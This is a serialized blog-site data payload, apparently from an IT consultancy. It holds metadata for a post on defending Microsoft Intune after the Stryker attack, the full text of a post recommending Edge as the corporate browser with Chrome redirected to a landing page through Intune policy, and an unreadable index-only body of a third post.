Here is what happened, why it worked, and how the two architectural gaps that made it possible can be closed.","Stryker attack, Handala, Microsoft Intune wipe, privileged access management, admin workstation, Managed Red Tenant, Managed Intune, Zero Trust, Privileged Admin Workstation, PAW, Enterprise Access Model, CISA, endpoint management security",[24458,24460,24462],{"lang":2260,"href":24459},"/de/posts/2026-03-20-stryker-attack-intune-privilege",{"lang":2263,"href":24461},"/es/posts/2026-03-20-stryker-attack-intune-privilege",{"lang":2171,"href":24463},"/en/posts/2026-03-20-stryker-attack-intune-privilege",{"menuItems":24465},[24466,24468,24470,24472,24475,24477],{"href":24467,"text":24211},"#what-actually-happened",{"href":24469,"text":24226},"#why-this-attack-succeeded",{"href":24471,"text":24244},"#cisa-has-seen-enough",{"href":24473,"text":24474},"#separation-is-not-a-luxury-it-is-the-control","Separation is not a luxury",{"href":24476,"text":24271},"#two-layers-of-defense",{"href":24478,"text":24376},"#the-uncomfortable-question",{"quote":2181,"infos":24480},{"bgColor":2201,"headline":2202,"subline":24481,"level":41,"textStyling":2204,"flush":2205,"person":24482,"form":24484},"Want to know how Managed Red Tenant and Managed Intune close the gaps the Stryker attack exploited? Fill out the form and we'll walk you through how it maps to your environment.",{"image":2207,"cloudinary":2181,"alt":2208,"name":2209,"quotee":2209,"quoteeTitle":2210,"quote":24483},"The Stryker attack is a wake-up call for every organization running Microsoft Intune. The tool did exactly what it was told. The problem was that no one should have been able to tell it that — not from a compromised everyday account, not without a second approval, not without an isolated administrative environment. 
That is the gap we help organizations close.",{"ctaText":2213,"cta":24485,"method":2169,"action":2216,"fields":24486},{"skin":2215},[24487,24488,24489,24490,24491,24492,24493,24494,24496,24497,24498],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":8110,"type":2232,"id":2233,"required":2168,"requiredMsg":2234},{"label":8229,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2242,"value":2176},{"type":2241,"id":2244,"value":2245},{"type":2241,"id":2247,"value":24495},"Form: Blog Stryker Attack Intune Privilege | EN",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},{"type":2241,"id":2255},"/posts/2026-03-20-stryker-attack-intune-privilege",{"title":24198,"description":24204},"posts/2026-03-20-stryker-attack-intune-privilege",[3425,24503,5300],"Privileged Access","KiTB0W_U_7IfW2TDV3xVVIBiZyPA692HMsvP-eqGvEA",{"id":24506,"title":24507,"author":24508,"body":24509,"cta":2166,"description":24513,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":24700,"moment":24702,"navigation":2181,"path":24731,"seo":24732,"stem":24733,"tags":2166,"webcast":2168,"__hash__":24734},"content_en/posts/2026-03-21-microsoft-edge-corporate-browser.md","Why Edge Should Be Your Only Corporate Browser",[2331],{"type":9,"value":24510,"toc":24692},[24511,24514,24517,24519,24525,24529,24531,24534,24538,24540,24543,24557,24561,24563,24569,24575,24578,24621,24629,24633,24635,24643,24654,24658,24660,24663,24689],[12,24512,24513],{},"In today's enterprise environments, choosing the right browser is more than a matter of preference. It's a strategic decision that impacts security, manageability, and user productivity. 
While Google Chrome has long been a popular choice, Microsoft Edge has evolved into an enterprise-ready browser that offers compelling advantages, especially when using Microsoft 365 and managed through Microsoft Intune.",[41,24515,2176],{"id":24516},"security",[12,24518,31],{},[12,24520,24521,24522,24524],{},"Using a managed Microsoft Edge browser ensures that security features are consistently enforced across all endpoints. With native integration into Microsoft Defender SmartScreen, Edge provides protection against phishing, malware, and other threats. When deployed via Intune, policies can tightly control behavior, block risky extensions, and enforce safe browsing practices. glueckkanja's ",[2672,24523,24341],{"href":24340}," offers up-to-date Edge policies aligned with Microsoft's Security baselines.",[41,24526,24528],{"id":24527},"synchronization-with-entra-id-account","Synchronization with Entra ID Account",[12,24530,31],{},[12,24532,24533],{},"Edge supports secure synchronization of user data, such as favourites, passwords, and settings, across devices via Entra ID accounts. This is especially beneficial in hybrid work scenarios, allowing users to switch between corporate laptops, virtual desktops, and mobile devices without losing context or productivity.",[41,24535,24537],{"id":24536},"avoiding-complexity-offering-multiple-browsers-adds-overhead","Avoiding Complexity: Offering Multiple Browsers Adds Overhead",[12,24539,31],{},[12,24541,24542],{},"Supporting alternative browsers like Google Chrome in a corporate environment often requires additional infrastructure and effort:",[1254,24544,24545,24551],{"style":23466},[1257,24546,24547,24550],{},[251,24548,24549],{},"Backup and Sync Strategies:"," Other browsers often require third-party accounts (e.g. a Google Account) to enable synchronization.",[1257,24552,24553,24556],{},[251,24554,24555],{},"Policy Maintenance:"," Each browser requires its own set of security and configuration policies. 
Maintaining these across multiple platforms demands ongoing effort, increases the risk of misconfiguration, and complicates audits.",[41,24558,24560],{"id":24559},"policy-driven-chrome-redirection-via-intune","Policy-Driven Chrome Redirection via Intune",[12,24562,31],{},[12,24564,24565,24566,24568],{},"To guide users from Chrome to Edge, organizations can implement a redirection policy using Microsoft Intune — ready-to-use and implemented within minutes via glueckkanja's ",[2672,24567,24341],{"href":24340},". Users are greeted with a landing page that highlights Microsoft Edge as the default corporate browser, along with a one-click option to launch it directly.",[12,24570,24571],{},[2642,24572],{"alt":24573,"src":24574},"Microsoft Edge as the default corporate browser","https://res.cloudinary.com/c4a8/image/upload/blog/pics/microsoft-edge-default-browser.png",[12,24576,24577],{},"The configuration policy demonstrates how Chrome can be restricted and redirected:",[1254,24579,24580,24594,24603,24609,24615],{"style":23466},[1257,24581,24582,24585,24586,24589,24590,24593],{},[251,24583,24584],{},"URL Allowlist:"," Only specific URLs like the landing page ",[63,24587,24588],{},"https://edge.glueckkanja.com/"," and the moniker ",[63,24591,24592],{},"microsoft-edge:*"," are permitted.",[1257,24595,24596,24599,24600,24602],{},[251,24597,24598],{},"URL Blocklist:"," All other URLs are blocked (",[63,24601,1291],{},"), effectively disabling general browsing in Chrome.",[1257,24604,24605,24608],{},[251,24606,24607],{},"Homepage and New Tab Page:"," Both are set to the landing page that encourages users to open Microsoft Edge.",[1257,24610,24611,24614],{},[251,24612,24613],{},"Protocol Handling:"," Chrome is configured to auto-launch Edge when clicking URLs on the landing page.",[1257,24616,24617,24620],{},[251,24618,24619],{},"Extension Control:"," Additional settings restrict extension installation.",[12,24622,24623,24624],{},"Example policy as download: 
",[2672,24625,24628],{"href":24626,"rel":24627},"https://github.com/glueckkanja/edge-redirection-landingpage/tree/main/docs/policies",[2676],"Win - Default - Google Chrome - Redirect to Edge - v2.0.json",[41,24630,24632],{"id":24631},"landing-page-via-github-pages","Landing Page via GitHub Pages",[12,24634,31],{},[12,24636,24637,24638],{},"The website is powered by GitHub Pages. Feel free to adjust it to your needs and contribute to the GitHub project: ",[2672,24639,24642],{"href":24640,"rel":24641},"https://github.com/glueckkanja/edge-redirection-landingpage",[2676],"edge-redirection-landingpage",[12,24644,24645],{},[2672,24646,24651],{"role":5993,"className":24647,"dataText":24648,"href":24649,"target":4914,"rel":24650,"type":6003},[5995,5996,5999,6000],"See the landing page in action","https://edge.glueckkanja.com",[24327],[102,24652,24648],{"className":24653},[6007],[41,24655,24657],{"id":24656},"key-takeaways","Key Takeaways",[12,24659,31],{},[12,24661,24662],{},"Microsoft Edge offers a secure, manageable browsing experience with deep integration into Microsoft 365, making it the logical choice as the default corporate browser. The key advantages:",[1254,24664,24665,24668,24671,24674,24677,24680,24683,24686],{"style":23466},[1257,24666,24667],{},"Seamless Entra ID integration (SSO)",[1257,24669,24670],{},"Cloud-based sync and backup via Microsoft 365 account across multiple platforms",[1257,24672,24673],{},"Built-in security ecosystem (Microsoft Defender SmartScreen and Microsoft Endpoint DLP)",[1257,24675,24676],{},"Intune App Protection Policy support",[1257,24678,24679],{},"Browser management via Microsoft 365 admin center and Intune",[1257,24681,24682],{},"Internet Explorer mode for legacy compatibility",[1257,24684,24685],{},"Corporate branding",[1257,24687,24688],{},"Copilot integration",[12,24690,24691],{},"Standardizing on Edge reduces complexity, strengthens security, and simplifies support. 
Extending the redirection approach to other common browsers is a feasible next step as well.",{"title":65,"searchDepth":111,"depth":111,"links":24693},[24694,24695,24696,24697,24698,24699],{"id":24516,"depth":111,"text":2176},{"id":24527,"depth":111,"text":24528},{"id":24536,"depth":111,"text":24537},{"id":24559,"depth":111,"text":24560},{"id":24631,"depth":111,"text":24632},{"id":24656,"depth":111,"text":24657},{"lang":2171,"seoTitle":24701,"titleClass":2173,"date":24702,"blogtitlepic":24703,"socialimg":24704,"customExcerpt":24705,"keywords":24706,"hreflang":24707,"published":2181,"asideNav":24714},"Microsoft Edge as the Secured Corporate Browser: Security, Sync, and Chrome Redirection via Intune","2026-03-21","head-microsoft-edge-default-browser.jpg","/blog/heads/head-microsoft-edge-default-browser.jpg","The browser nobody satisfies chose became the one everybody manages. Most companies never made a deliberate decision for Chrome; it just showed up, brought its own sync logic, its own account layer, its own policy surface. Meanwhile, Microsoft Edge matured into a browser that plugs directly into the infrastructure enterprises already run: Entra ID, Intune, Defender. 
This post shows how to make that switch official, redirect Chrome to a landing page via Intune policy, and retire the complexity that comes with maintaining two browsers in parallel.","Microsoft Edge, corporate browser, Microsoft Intune, Entra ID, Chrome redirection, Managed Intune, browser policy, Microsoft Defender SmartScreen, enterprise browser, browser management, URL blocklist, URL allowlist",[24708,24710,24712],{"lang":2260,"href":24709},"/de/posts/2026-03-21-microsoft-edge-corporate-browser",{"lang":2171,"href":24711},"/en/posts/2026-03-21-microsoft-edge-corporate-browser",{"lang":2263,"href":24713},"/es/posts/2026-03-21-microsoft-edge-corporate-browser",{"menuItems":24715},[24716,24718,24721,24724,24727,24729],{"href":24717,"text":2176},"#security",{"href":24719,"text":24720},"#synchronization-with-entra-id-account","Synchronization with Entra ID",{"href":24722,"text":24723},"#avoiding-complexity-offering-multiple-browsers-adds-overhead","Avoiding Complexity",{"href":24725,"text":24726},"#policy-driven-chrome-redirection-via-intune","Chrome Redirection via 
Intune",{"href":24728,"text":24632},"#landing-page-via-github-pages",{"href":24730,"text":24657},"#key-takeaways","/posts/2026-03-21-microsoft-edge-corporate-browser",{"title":24507,"description":24513},"posts/2026-03-21-microsoft-edge-corporate-browser","AsMZExVFaHmpVg3-wvTocO819mSe8A4QZIdrFls8YIw",{"id":4,"title":5,"author":24736,"body":24737,"cta":2166,"description":14,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":26206,"moment":2174,"navigation":2181,"path":2265,"seo":26237,"stem":2267,"tags":26238,"webcast":2168,"__hash__":2274},[7],{"type":9,"value":24738,"toc":26170},[24739,24741,24743,24745,24747,24749,24751,24753,24755,24757,24759,24761,24763,24770,24772,24774,24781,24783,24785,24787,24789,24803,24805,24812,24814,24821,24825,24827,24829,24831,24838,24846,24848,24850,24852,24854,24856,24863,24865,24867,24874,24876,24878,24880,24882,24884,24886,24893,24895,24897,24901,24903,24967,24969,24995,24997,24999,25001,25005,25007,25009,25011,25067,25069,25071,25077,25081,25123,25129,25133,25135,25137,25183,25185,25187,25191,25193,25195,25197,25201,25215,25337,25339,25346,25352,25354,25361,25369,25377,25379,25381,25383,25393,25407,25545,25547,25554,25556,25558,25560,25562,25564,25566,25620,25622,25632,25682,25684,25686,25688,25690,25692,25696,25734,25736,25743,25745,25747,25749,25751,25755,25763,25797,25805,25839,25845,25853,25855,25857,25859,25861,25865,25867,25874,25876,25883,25891,25893,25895,25897,25899,25905,25907,25909,25919,25926,25934,25946,25948,25950,25952,25959,25961,25968,25976,25978,25980,25982,25989,25999,26003,26005,26007,26014,26018,26022,26024,26026,26033,26035,26037,26039,26046,26048,26050,26052,26059,26061,26063,26070,26072,26074,26081,26083,26085,26092,26104,26108,26110,26112,26114,26118,26132,26134,26142,26144,26146,26148,26150,26152,26154,26156,26168],[12,24740,14],{},[12,24742,17],{},[12,24744,20],{},[22,24746],{},[25,24748,28],{"id":27},[12,24750,31],{},[12,24752,34],{},[12,24754,37],{},[22,24756],{},[41,24758,44],{"id
":43},[12,24760,47],{},[12,24762,50],{},[52,24764,24765],{"style":54},[56,24766,24768],{"className":24767,"code":60,"language":61},[59],[63,24769,60],{"__ignoreMap":65},[12,24771,68],{},[12,24773,71],{},[52,24775,24776],{"style":54},[56,24777,24779],{"className":24778,"code":77,"language":61},[59],[63,24780,77],{"__ignoreMap":65},[12,24782,82],{},[41,24784,86],{"id":85},[12,24786,47],{},[12,24788,91],{},[52,24790,24791],{"style":54},[56,24792,24793],{"className":96,"code":97,"language":98,"meta":65,"style":65},[63,24794,24795,24799],{"__ignoreMap":65},[102,24796,24797],{"class":104,"line":105},[102,24798,108],{},[102,24800,24801],{"class":104,"line":111},[102,24802,114],{},[12,24804,117],{},[52,24806,24807],{"style":54},[56,24808,24810],{"className":24809,"code":123,"language":61},[59],[63,24811,123],{"__ignoreMap":65},[12,24813,128],{},[52,24815,24816],{"style":54},[56,24817,24819],{"className":24818,"code":134,"language":61},[59],[63,24820,134],{"__ignoreMap":65},[12,24822,139,24823,143],{},[63,24824,142],{},[41,24826,147],{"id":146},[12,24828,47],{},[12,24830,152],{},[52,24832,24833],{"style":54},[56,24834,24836],{"className":24835,"code":158,"language":61},[59],[63,24837,158],{"__ignoreMap":65},[12,24839,163,24840,167,24842,171,24844,175],{},[63,24841,166],{},[63,24843,170],{},[63,24845,174],{},[41,24847,179],{"id":178},[12,24849,47],{},[12,24851,184],{},[186,24853,189],{"id":188},[12,24855,192],{},[52,24857,24858],{"style":54},[56,24859,24861],{"className":24860,"code":198,"language":61},[59],[63,24862,198],{"__ignoreMap":65},[186,24864,204],{"id":203},[12,24866,192],{},[52,24868,24869],{"style":54},[56,24870,24872],{"className":24871,"code":212,"language":61},[59],[63,24873,212],{"__ignoreMap":65},[186,24875,218],{"id":217},[12,24877,192],{},[12,24879,223],{},[186,24881,227],{"id":226},[12,24883,192],{},[12,24885,232],{},[52,24887,24888],{"style":54},[56,24889,24891],{"className":24890,"code":238,"language":61},[59],[63,24892,238],{"__ignoreMap":65},[186,24894
,244],{"id":243},[12,24896,192],{},[12,24898,249,24899,254],{},[251,24900,253],{},[12,24902,257],{},[52,24904,24905],{"style":54},[56,24906,24907],{"className":262,"code":263,"language":264,"meta":65,"style":65},[63,24908,24909,24929,24947,24959],{"__ignoreMap":65},[102,24910,24911,24913,24915,24917,24919,24921,24923,24925,24927],{"class":104,"line":105},[102,24912,272],{"class":271},[102,24914,276],{"class":275},[102,24916,279],{"class":275},[102,24918,282],{"class":275},[102,24920,286],{"class":285},[102,24922,290],{"class":289},[102,24924,294],{"class":293},[102,24926,297],{"class":285},[102,24928,300],{"class":289},[102,24930,24931,24933,24935,24937,24939,24941,24943,24945],{"class":104,"line":111},[102,24932,305],{"class":271},[102,24934,308],{"class":275},[102,24936,311],{"class":275},[102,24938,314],{"class":275},[102,24940,317],{"class":275},[102,24942,320],{"class":275},[102,24944,323],{"class":289},[102,24946,326],{"class":275},[102,24948,24949,24951,24953,24955,24957],{"class":104,"line":329},[102,24950,332],{"class":275},[102,24952,335],{"class":289},[102,24954,338],{"class":275},[102,24956,341],{"class":289},[102,24958,326],{"class":275},[102,24960,24961,24963,24965],{"class":104,"line":346},[102,24962,349],{"class":275},[102,24964,352],{"class":289},[102,24966,355],{"class":289},[12,24968,358],{},[52,24970,24971],{"style":54},[56,24972,24973],{"className":262,"code":363,"language":264,"meta":65,"style":65},[63,24974,24975,24989],{"__ignoreMap":65},[102,24976,24977,24979,24981,24983,24985,24987],{"class":104,"line":105},[102,24978,370],{"class":271},[102,24980,373],{"class":275},[102,24982,286],{"class":285},[102,24984,290],{"class":289},[102,24986,294],{"class":293},[102,24988,382],{"class":285},[102,24990,24991,24993],{"class":104,"line":111},[102,24992,370],{"class":271},[102,24994,300],{"class":289},[22,24996],{},[25,24998,394],{"id":393},[12,25000,31],{},[12,25002,399,25003,403],{},[63,25004,402],{},[12,25006,406],{},[41,25008,410],{"id":409},[12,2
5010,47],{},[52,25012,25013],{"style":415},[417,25014,420,25015,420,25023],{"style":419},[422,25016,424,25017,420],{},[426,25018,428,25019,428,25021,424],{},[430,25020,433],{"style":432},[430,25022,436],{"style":432},[438,25024,424,25025,424,25031,424,25037,424,25043,424,25051,424,25059,420],{},[426,25026,428,25027,428,25029,424],{},[443,25028,446],{"style":445},[443,25030,449],{"style":445},[426,25032,428,25033,428,25035,424],{},[443,25034,455],{"style":454},[443,25036,458],{"style":454},[426,25038,428,25039,428,25041,424],{},[443,25040,463],{"style":445},[443,25042,466],{"style":445},[426,25044,428,25045,428,25047,424],{},[443,25046,471],{"style":454},[443,25048,25049],{"style":454},[63,25050,476],{},[426,25052,428,25053,428,25055,424],{},[443,25054,481],{"style":445},[443,25056,25057],{"style":445},[63,25058,486],{},[426,25060,428,25061,428,25063,424],{},[443,25062,491],{"style":454},[443,25064,25065],{"style":454},[63,25066,496],{},[41,25068,500],{"id":499},[12,25070,47],{},[12,25072,505,25073,509,25075,513],{},[63,25074,508],{},[63,25076,512],{},[12,25078,516,25079,520],{},[63,25080,519],{},[52,25082,25083],{"style":54},[524,25084,25085,25087,25089,25091,540,25093,545,25095,548,25097,552,25099,25107],{},[102,25086,529],{"style":528},[531,25088],{},[102,25090,535],{"style":528},[102,25092,539],{"style":538},[102,25094,544],{"style":543},[102,25096,539],{"style":538},[102,25098,551],{"style":538},[12,25100,25101,558,25103,545,25105,566],{},[102,25102,557],{"style":528},[102,25104,561],{"style":543},[102,25106,565],{"style":564},[12,25108,25109,25111,575,25113,578,25115,582,25117,586,25119,590,25121,594],{},[102,25110,571],{"style":528},[102,25112,574],{"style":528},[102,25114,63],{"style":538},[102,25116,581],{"style":538},[102,25118,585],{"style":564},[102,25120,589],{"style":564},[102,25122,593],{"style":538},[12,25124,597,25125,601,25127,605],{},[63,25126,600],{},[63,25128,604],{},[12,25130,608,25131,612],{},[251,25132,611],{},[41,25134,616],{"id":615},[12,251
36,47],{},[52,25138,25139],{"style":54},[56,25140,25141],{"className":623,"code":624,"language":625,"meta":65,"style":65},[63,25142,25143,25147,25151,25155,25159,25163,25167,25171,25175,25179],{"__ignoreMap":65},[102,25144,25145],{"class":104,"line":105},[102,25146,632],{},[102,25148,25149],{"class":104,"line":111},[102,25150,637],{},[102,25152,25153],{"class":104,"line":329},[102,25154,642],{},[102,25156,25157],{"class":104,"line":346},[102,25158,647],{},[102,25160,25161],{"class":104,"line":650},[102,25162,653],{},[102,25164,25165],{"class":104,"line":656},[102,25166,659],{},[102,25168,25169],{"class":104,"line":662},[102,25170,665],{},[102,25172,25173],{"class":104,"line":668},[102,25174,671],{},[102,25176,25177],{"class":104,"line":674},[102,25178,677],{},[102,25180,25181],{"class":104,"line":680},[102,25182,683],{},[41,25184,687],{"id":686},[12,25186,47],{},[12,25188,692,25189,696],{},[63,25190,695],{},[22,25192],{},[186,25194,702],{"id":701},[12,25196,192],{},[12,25198,707,25199,711],{},[63,25200,710],{},[12,25202,714,25203,718,25205,722,25207,726,25209,718,25211,733,25213,737],{},[63,25204,717],{},[63,25206,721],{},[63,25208,725],{},[63,25210,729],{},[63,25212,732],{},[63,25214,736],{},[52,25216,25217],{"style":54},[524,25218,25219,25221,25223,25225,540,25227,545,25229,757,25231,760,25233,763,25235,766,25237,770,25239],{},[102,25220,744],{"style":528},[531,25222],{},[102,25224,749],{"style":528},[102,25226,539],{"style":538},[102,25228,717],{"style":543},[102,25230,756],{"style":538},[102,25232,756],{"style":538},[102,25234,539],{"style":538},[102,25236,756],{"style":538},[102,25238,769],{"style":538},[12,25240,773,25241,545,25243,780,25245,25249,789,25251,792,25253,25255,25257,801,25259,805,25261,809,25263,813,25265,816,25267,578,25269,821,25271,825,25273,829,25275,832,25277,836,25279,840,25281,578,25283,846,25285,850,25287,25289,25291,859,25293,578,25295,864,25297,867,25299,870,25301,876,25305,880,25307,886,25311,890,25313,893,25315,899,25319,902,25321,905,
25323,909,25325,913,25327,916,25329,25331,25333,925,25335,594],{},[102,25242,776],{"style":543},[102,25244,779],{"style":564},[102,25246,783,25247],{"style":528},[531,25248],{},[102,25250,788],{"style":543},[102,25252,779],{"style":564},[102,25254,795],{"style":528},[531,25256],{},[102,25258,800],{"style":543},[102,25260,804],{"style":564},[102,25262,808],{"style":564},[102,25264,812],{"style":528},[102,25266,808],{"style":564},[102,25268,769],{"style":538},[102,25270,756],{"style":538},[102,25272,824],{"style":564},[102,25274,828],{"style":538},[102,25276,756],{"style":538},[102,25278,835],{"style":538},[102,25280,839],{"style":564},[102,25282,843],{"style":538},[102,25284,756],{"style":538},[102,25286,849],{"style":564},[102,25288,853],{"style":528},[531,25290],{},[102,25292,858],{"style":528},[102,25294,843],{"style":538},[102,25296,756],{"style":538},[102,25298,843],{"style":538},[102,25300,551],{"style":538},[102,25302,873,25303],{},[102,25304,839],{"style":564},[102,25306,879],{"style":564},[102,25308,873,25309],{},[102,25310,885],{"style":564},[102,25312,889],{"style":564},[102,25314,843],{"style":538},[102,25316,25317],{},[102,25318,898],{"style":564},[102,25320,839],{"style":564},[102,25322,879],{"style":564},[102,25324,908],{"style":528},[102,25326,912],{"style":538},[102,25328,804],{"style":564},[102,25330,919],{"style":528},[531,25332],{},[102,25334,924],{"style":543},[102,25336,593],{"style":538},[12,25338,930],{},[52,25340,25341],{"style":54},[56,25342,25344],{"className":25343,"code":936,"language":61},[59],[63,25345,936],{"__ignoreMap":65},[12,25347,941,25348,945,25350,949],{},[63,25349,944],{},[63,25351,948],{},[12,25353,952],{},[52,25355,25356],{"style":54},[56,25357,25359],{"className":25358,"code":958,"language":61},[59],[63,25360,958],{"__ignoreMap":65},[12,25362,399,25363,966,25365,970,25367,974],{},[63,25364,965],{},[63,25366,969],{},[63,25368,973],{},[12,25370,977,25371,980,25373,983,25375,987],{},[63,25372,729],{},[63,25374,736],{},[63,25376
,986],{},[22,25378],{},[186,25380,993],{"id":992},[12,25382,192],{},[12,25384,998,25385,1002,25387,718,25389,1009,25391,1013],{},[63,25386,1001],{},[63,25388,1005],{},[63,25390,1008],{},[63,25392,1012],{},[12,25394,1016,25395,873,25397,805,25399,873,25401,805,25403,873,25405,1035],{},[63,25396,1019],{},[63,25398,1022],{},[63,25400,1025],{},[63,25402,1028],{},[63,25404,1031],{},[63,25406,1034],{},[52,25408,25409],{"style":54},[524,25410,25411,25413,25415,1049,25417,578,25419,1055,25421,540,25423,1061,25425,1065,25427,420,25429,540,25431,1074,25433,1078,25435,1081,25437,420,25439,540,25441,1074,25443,1078,25445,1081,25447,420,25449,420,25451,540,25453,1061,25455,540,25457,1074,25459,1078,25461,1114,25463,420,25465,540,25467,1061,25469,540,25471,1074,25473,1078,25475,1114,25477,420,25479,540,25481,1061,25483,540,25485,1146,25487,1078,25489,1114,25491,420,25493,540,25495,1061,25497,540,25499,1165,25501,1078,25503,1114,25505,420,25507,540,25509,1061,25511,540,25513,1074,25515,1078,25517,1114,25519,420,25521,540,25523,1061,25525,540,25527,1074,25529,1078,25531,1114,25533,1208,25535,859,25537,578,25539,1217,25541,1220,25543,1224],{},[102,25412,1042],{"style":528},[102,25414,1045],{"style":528},[102,25416,1048],{"style":538},[102,25418,1052],{"style":538},[102,25420,756],{"style":538},[102,25422,1058],{"style":538},[102,25424,1019],{"style":564},[102,25426,1064],{"style":538},[102,25428,1068],{"style":528},[102,25430,1058],{"style":538},[102,25432,1073],{"style":564},[102,25434,1077],{"style":564},[102,25436,1064],{"style":538},[102,25438,1084],{"style":528},[102,25440,1058],{"style":538},[102,25442,1089],{"style":564},[102,25444,1092],{"style":564},[102,25446,1064],{"style":538},[102,25448,1097],{"style":528},[102,25450,1100],{"style":528},[102,25452,1058],{"style":538},[102,25454,1025],{"style":564},[102,25456,1058],{"style":538},[102,25458,1031],{"style":564},[102,25460,1111],{"style":564},[102,25462,1064],{"style":538},[102,25464,1117],{"style":528},[102,25466,1058],{"s
tyle":538},[102,25468,1122],{"style":564},[102,25470,1058],{"style":538},[102,25472,1127],{"style":564},[102,25474,1130],{"style":564},[102,25476,1064],{"style":538},[102,25478,1135],{"style":528},[102,25480,1058],{"style":538},[102,25482,1140],{"style":564},[102,25484,1058],{"style":538},[102,25486,1145],{"style":564},[102,25488,1149],{"style":564},[102,25490,1064],{"style":538},[102,25492,1154],{"style":528},[102,25494,1058],{"style":538},[102,25496,1159],{"style":564},[102,25498,1058],{"style":538},[102,25500,1164],{"style":564},[102,25502,1168],{"style":564},[102,25504,1064],{"style":538},[102,25506,1173],{"style":528},[102,25508,1058],{"style":538},[102,25510,1178],{"style":564},[102,25512,1058],{"style":538},[102,25514,1183],{"style":564},[102,25516,1186],{"style":564},[102,25518,1064],{"style":538},[102,25520,1191],{"style":528},[102,25522,1058],{"style":538},[102,25524,1028],{"style":564},[102,25526,1058],{"style":538},[102,25528,1034],{"style":564},[102,25530,1202],{"style":564},[102,25532,1064],{"style":538},[102,25534,1207],{"style":528},[102,25536,1211],{"style":528},[102,25538,1214],{"style":538},[102,25540,756],{"style":538},[102,25542,581],{"style":538},[102,25544,1223],{"style":564},[12,25546,1227],{},[52,25548,25549],{"style":54},[56,25550,25552],{"className":25551,"code":1233,"language":61},[59],[63,25553,1233],{"__ignoreMap":65},[12,25555,1238],{},[12,25557,1241],{},[22,25559],{},[186,25561,1247],{"id":1246},[12,25563,192],{},[12,25565,1252],{},[1254,25567,25568,25602],{},[1257,25569,25570,1262,25572,805,25574,805,25576,805,25578,805,25580,805,25582,805,25584,805,25586,805,25588,805,25590,805,25592,805,25594,805,25596,805,25598,805,25600],{},[63,25571,1261],{},[63,25573,1265],{},[63,25575,1268],{},[63,25577,1271],{},[63,25579,1274],{},[63,25581,1277],{},[63,25583,1280],{},[63,25585,1283],{},[63,25587,545],{},[63,25589,1288],{},[63,25591,1291],{},[63,25593,1294],{},[63,25595,1297],{},[63,25597,873],{},[63,25599,1013],{},[63,25601,1304],{},[1257,256
03,25604,1061,25606,805,25608,805,25610,805,25612,805,25614,805,25616,805,25618,1331],{},[63,25605,1309],{},[63,25607,1312],{},[63,25609,1315],{},[63,25611,1318],{},[63,25613,1321],{},[63,25615,1324],{},[63,25617,1327],{},[63,25619,1330],{},[12,25621,1334],{},[12,25623,1337,25624,1341,25626,1345,25628,1349,25630,1353],{},[63,25625,1340],{},[63,25627,1344],{},[63,25629,1348],{},[63,25631,1352],{},[52,25633,25634],{"style":54},[524,25635,25636,1361,25638,1364,25640,1367,25642,1370,25644,1374,25646,420,25648,1380,25650,1383,25652,424,25654,1389,25656,1393,25658,1396,25660,424,25662,1402,25664,1406,25666,1410,25668,1413,25670,1417,25672,1420,25674,578,25676,1426,25678,1429,25680,1432],{},[102,25637,1360],{"style":528},[102,25639,808],{"style":564},[102,25641,828],{"style":538},[102,25643,1052],{"style":538},[102,25645,1373],{"style":543},[102,25647,1377],{"style":528},[102,25649,835],{"style":538},[102,25651,808],{"style":564},[102,25653,1386],{"style":528},[102,25655,1373],{"style":543},[102,25657,1392],{"style":538},[102,25659,585],{"style":564},[102,25661,1399],{"style":528},[102,25663,912],{"style":538},[102,25665,1405],{"style":564},[102,25667,1409],{"style":543},[102,25669,843],{"style":538},[102,25671,1416],{"style":528},[102,25673,824],{"style":564},[102,25675,1423],{"style":538},[102,25677,756],{"style":538},[102,25679,839],{"style":564},[102,25681,912],{"style":538},[12,25683,1435],{},[22,25685],{},[186,25687,1441],{"id":1440},[12,25689,192],{},[12,25691,1446],{},[12,25693,1449,25694,1453],{},[63,25695,1452],{},[52,25697,25698],{"style":54},[524,25699,25700,25702,25704,540,25706,545,25708,757,25710,1472,25712,1476,25714,420,25716,420,25718,1486,25720,1489,25722,1492,25724,1495,25726,1114,25728,1502,25730,1505,25732,1508],{},[102,25701,1460],{"style":528},[102,25703,1463],{"style":528},[102,25705,551],{"style":538},[102,25707,1452],{"style":543},[102,25709,843],{"style":538},[102,25711,551],{"style":538},[102,25713,1475],{"style":564},[102,25715,1479],{"style":
528},[102,25717,1482],{"style":528},[102,25719,1485],{"style":538},[102,25721,808],{"style":564},[102,25723,839],{"style":564},[102,25725,551],{"style":538},[102,25727,1498],{"style":564},[102,25729,1501],{"style":528},[102,25731,839],{"style":564},[102,25733,593],{"style":538},[12,25735,1511],{},[52,25737,25738],{"style":54},[56,25739,25741],{"className":25740,"code":1517,"language":61},[59],[63,25742,1517],{"__ignoreMap":65},[12,25744,1522],{},[22,25746],{},[186,25748,1528],{"id":1527},[12,25750,192],{},[12,25752,1533,25753,1537],{},[251,25754,1536],{},[12,25756,25757,1543,25759,718,25761,1550],{},[251,25758,1542],{},[63,25760,1546],{},[63,25762,1549],{},[52,25764,25765],{"style":54},[524,25766,25767,1558,25769,1364,25771,1564,25773,578,25775,1569,25777,1572,25779,578,25781,1577,25783,1580,25785,578,25787,1585,25789,1588,25791,1592,25793,1595,25795,1598],{},[102,25768,1557],{"style":528},[102,25770,1561],{"style":564},[102,25772,828],{"style":538},[102,25774,1214],{"style":538},[102,25776,756],{"style":538},[102,25778,581],{"style":538},[102,25780,1214],{"style":538},[102,25782,756],{"style":538},[102,25784,1223],{"style":564},[102,25786,1214],{"style":538},[102,25788,756],{"style":538},[102,25790,551],{"style":538},[102,25792,1591],{"style":528},[102,25794,839],{"style":564},[102,25796,912],{"style":538},[12,25798,25799,805,25801,718,25803,1550],{},[251,25800,1603],{},[63,25802,1606],{},[63,25804,1609],{},[52,25806,25807],{"style":54},[524,25808,25809,1558,25811,1364,25813,1564,25815,578,25817,1626,25819,1572,25821,578,25823,1633,25825,1580,25827,578,25829,1585,25831,1588,25833,1592,25835,1595,25837,1598],{},[102,25810,1616],{"style":528},[102,25812,1619],{"style":564},[102,25814,828],{"style":538},[102,25816,1214],{"style":538},[102,25818,756],{"style":538},[102,25820,5